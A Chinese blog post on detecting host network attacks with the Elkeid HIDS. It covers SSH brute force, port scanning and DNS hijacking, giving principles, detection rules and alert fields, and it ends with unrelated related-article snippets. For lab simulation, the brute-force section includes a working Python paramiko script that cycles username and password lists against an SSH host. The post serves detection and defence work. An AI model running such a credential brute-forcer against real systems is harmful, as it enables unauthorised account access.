主机安全-网络攻击监测

目录

  • 概述
  • 暴力破解(SSH爆破为例)
    • 原理
    • 规则
    • 攻击模拟
    • 告警
  • 端口扫描
    • 原理
    • 规则
    • 攻击模拟
    • 告警
  • 流量劫持
    • 原理
    • 规则
    • 攻击模拟
    • 告警
  • 参考


概述

本文介绍主机网络层面上的攻击场景,每种攻击场景举一个例子。监测方面以字节跳动的开源HIDS elkeid举例。

针对网络攻击,通常可以考虑从以下方面做规则

  • 来源ip:针对异常ip,有访问即告警。
  • 访问端口:针对高危端口,有访问即告警。
  • 访问频率:针对过多的访问,在一段时间内超过频率即告警。例如,对同一端口或多个端口。

暴力破解(SSH爆破为例)

原理

暴力破解指的是针对开放的端口,提供的服务需要凭据才能访问,但是没有对用户行为做频率的限制,存在弱口令时可能爆破成功。

规则

在这里插入图片描述
bruteforce_single_source_detect
这个是针对单一源ip做的告警
在这里插入图片描述
bruteforce_multi_source_detect
在这里插入图片描述
bruteforce_success_detect
暴力破解,通过密码登录成功
在这里插入图片描述

攻击模拟

import paramiko# 配置目标主机的IP地址和端口
TARGET_IP = '172.19.0.16'  # 替换为目标IP
TARGET_PORT = 22  # 替换为目标端口# 读取用户名和密码
def read_file(filename):with open(filename, 'r') as file:return [line.strip() for line in file]# 尝试SSH登录
def attempt_ssh_login(username, password):ssh = paramiko.SSHClient()ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())try:ssh.connect(TARGET_IP, port=TARGET_PORT, username=username, password=password)return Trueexcept paramiko.AuthenticationException:return Falseexcept Exception as e:print(f"Error connecting to {TARGET_IP}: {e}")return Falsefinally:ssh.close()def main():usernames = read_file('username.txt')passwords = read_file('password.txt')for username in usernames:for password in passwords:success = attempt_ssh_login(username, password)if success:print(f"Success: Username: {username}, Password: {password}")else:print(f"Failed: Username: {username}, Password: {password}")if __name__ == "__main__":main()

在这里插入图片描述

告警

在这里插入图片描述
在这里插入图片描述
给出了源ip,除了这个还可以考虑提供其他信息

  • 尝试次数
  • 失败次数
  • 成功次数
  • 成功用户
  • 登录的时间

端口扫描

原理

对多个端口发起网络探测,确定端口存活、协议等指纹信息。

规则

这里elkeid没有给出,根据原理可以类似ssh爆破,对同一个ip来源扫描多个端口或对单个端口以不同协议高频率扫描。

攻击模拟

使用nmap或masscan等端口扫描工具即可。

告警

告警推荐包含以下字段:

  • 源ip
  • 源端口
  • 扫描开始时间

流量劫持

原理

流量劫持是指在主机和第三方服务之间添加了恶意攻击者,常见DNS劫持、HTTP劫持、CDN劫持等。以DNS劫持为例,攻击者可能篡改了主机的DNS配置文件。

规则

编写规则时可以考虑检测配置文件,或者判断流量的特征。例如,DNS的配置文件为/etc/resolv.conf。DNS隧道攻击时,流量中会有大量的编码后的子域名请求特征。

攻击模拟

这个需要一个远程服务器,从github上也没看到fake dns server之类的,先留个坑。

告警

告警推荐包含以下字段:

  • 本地文件
  • 修改内容
  • 恶意服务器域名或ip

参考

流量劫持
DNS隧道攻击原理及常用攻击分析

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/408240.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

当前A股平均市盈率

再写一篇【不务正业】的 2023-08-23A股平均市盈率 来自乐咕乐股网 当前A股市盈率是否为低点? 不言而喻 ‌当前A股市场的市盈率确实处于相对低位。‌ 根据东方财富Choice最新数据显示数据,截至2024年8月23日,全A市盈率为13.06倍,…

初识C语言指针(3)

目录 1. 数组名的理解 2. 使⽤指针访问数组 3. ⼀维数组传参的本质 4. 冒泡排序 5. 二级指针 6. 指针数组 7. 指针数组模拟⼆维数组 结语 1. 数组名的理解 对于数组名想必大家并不陌生,数组名就是该数组首元素的地址,设想有一个arr 数组。我们…

解决github访问慢的问题

GitHub是全球开发者广泛使用的代码托管平台,但有时由于网络问题,访问速度可能会受到影响,这对于依赖GitHub进行日常开发工作的程序员来说是一个不小的困扰。为了解决这一问题,我们可以通过修改本地hosts文件来尝试提升访问速度。 …

如何将 Parallels Desktop 许可证密钥移至新的 Mac?

根据 Parallels 最终用户许可协议(EULA)的规定,您最多可以在一台设备上下载、安装和使用 Parallels Desktop 的一个原始副本。但是面对更换新机的用户,可以通过迁移的方式把 Parallels Desktop 许可证密钥移至新的 Mac&#xff0c…

大数据-91 Spark 集群 RDD 编程-高阶 RDD广播变量 RDD累加器 Spark程序优化

点一下关注吧!!!非常感谢!!持续更新!!! 目前已经更新到了: Hadoop(已更完)HDFS(已更完)MapReduce(已更完&am…

井盖异动传感器:为城市安全加码

城市的地下管网错综复杂,井盖作为连接地面与地下的重要通道,其安全性至关重要。然而,由于各种原因导致的井盖丢失或损坏事件时有发生,给行人和车辆带来了极大的安全隐患。 一、智能科技,守护脚下安全 旭华智能井盖异…

SpringBoot2:创建项目及启动时相关报错整理

1、创建时报错 Initialization failed for https://start.aliyun.com/ Please check URL, network and proxy settings.Error message: Error parsing JSON response换官网地址初始化即可:https://start.spring.io/ 那么,大家肯定会疑问,官网…

【Java】Spring Boot使用 Email 传邮件 (上手图解)

Java系列文章目录 补充内容 Windows通过SSH连接Linux 第一章 Linux基本命令的学习与Linux历史 文章目录 Java系列文章目录一、前言二、学习内容:三、问题描述四、解决方案:4.1 认识依赖4.2 发送邮件步骤4.2.1 先获取授权码4.2.1 邮件配置4.2.2 主体内容…

堆《数据结构》

堆《数据结构》 1. 堆排序1.1 建堆向上调整建堆向下调整建堆 1.2 利用堆删除思想来进行排序1.3Top-k问题 2.堆的时间复杂度 1. 堆排序 1.1 建堆 建大堆 建小堆 向上调整建堆 AdjustUp建堆 void AdjustUp(HPDataType* a, int child) {// 初始条件// 中间过程// 结束条件int p…

【数据分析:RFM客户价值度模型】

前言: 💞💞大家好,我是书生♡,本阶段和大家一起分享和探索大数据技术RFM客户价值度模型,本篇文章主要讲述了:RFM客户价值度模型等等。欢迎大家一起探索讨论!!&#xff01…

机械学习—零基础学习日志(如何理解概率论7)

这里需要先理解伯努利试验。只有A与A逆,两种结果。 正态分布 再来一道习题~: 解析: 《概率论与数理统计期末不挂科|考研零基础入门4小时完整版(王志超)》学习笔记 王志超老师 (UP主)

5大分区管理器 - 最佳硬盘分区软件

分区是一个计算机术语,指的是在硬盘上创建多个区域,以便操作系统和分区管理软件能够高效地分别管理每个区域中的信息。经常使用电脑的人很可能会从拥有多个分区中受益。在硬盘上拥有分区的一个好处是,可以更轻松地将操作系统和程序文件与用户…

普元EOS-低开页面下拉选择控件加载列表数据

1 前言 普元EOS进行低代码开发页面可以高效提高开发效率,并且减少代码的出错机会。 在低代码开发页面的时候,表单页面中可以使用大量的常用控件。 本文将讲解下拉选择组件的使用。 2 下拉选择使用EOS内置字典作为数据源 下拉选择可从字典作为数据源&a…

粘包现象 | wireshark抓包的使用

在TCP协议的通信过程中,由于其面向流的特性,数据在传输过程中可能会发生粘包现象,即多个发送的数据包被接收方一次性接收,导致应用层无法正确解析数据。 1.粘包现象概述 TCP协议为了保证传输效率,可能会将多次send调…

ESP RainMaker OTA 自动签名功能的安全启动

【如果您之前有关注乐鑫的博客和新闻,那么应该对 ESP RainMaker 及其各项功能有所了解。如果不曾关注,建议先查看相关信息,知晓本文背景。】 在物联网系统的建构中,安全性是一项核心要素。乐鑫科技对系统安全给予了极高的重视。ES…

小程序学习day13-API Promise化、全局数据共享(状态管理)、分包

44、API Promise化 (1)基于回调函数的一部API的缺点:小程序官方提供的异步API都是基于回调函数实现的,容易造成回调地狱的问题,代码可读性、可维护性差 (2)API Promise化概念: 指…

【HarmonyOS NEXT星河版开发实战】页面跳转

个人主页→VON 收录专栏→鸿蒙综合案例开发​​​​​ 代码及其图片资源会发布于gitee上面(已发布) gitee地址https://gitee.com/wang-xin-jie234 目录 前言 界面功能介绍 界面构建过程 知识点概述 页面跳转 页面传参 全套源代码 Index页面 Sec…

C语言学习——文件

目录 十三、文件 13.1C文件概述 13.2文件类型指针 13.3文件的打开与关闭 文件的打开(fopen函数) 文件的关闭(fclose函数) 13.4文件的读写 fputc函数和fgetc函数(putc函数和getc函数) fread函数和fw…

【qt】自定义信号

我们在上篇中,服务器收到的消息是由线程类去处理的,消息在线程类中,传不到widget中的ui中去,如果我们要在界面显示客户端的消息,必须通过自定义信号. 1.构建信号 当线程收到信息,就会被填充在ba中&#xf…

PHPShort轻量级网址缩短程序源码开心版,内含汉化包

需要网址缩短并且想获得更多有关链接点击率和流量的数据分析,那么 PHPShort 可能是一个非常好的选择。PHPShort 是一款高级的 URL 缩短器平台,可以帮助你轻松地缩短链接,并根据受众群体的位置或平台来定位受众。 该程序基于 Laravel 框架编写…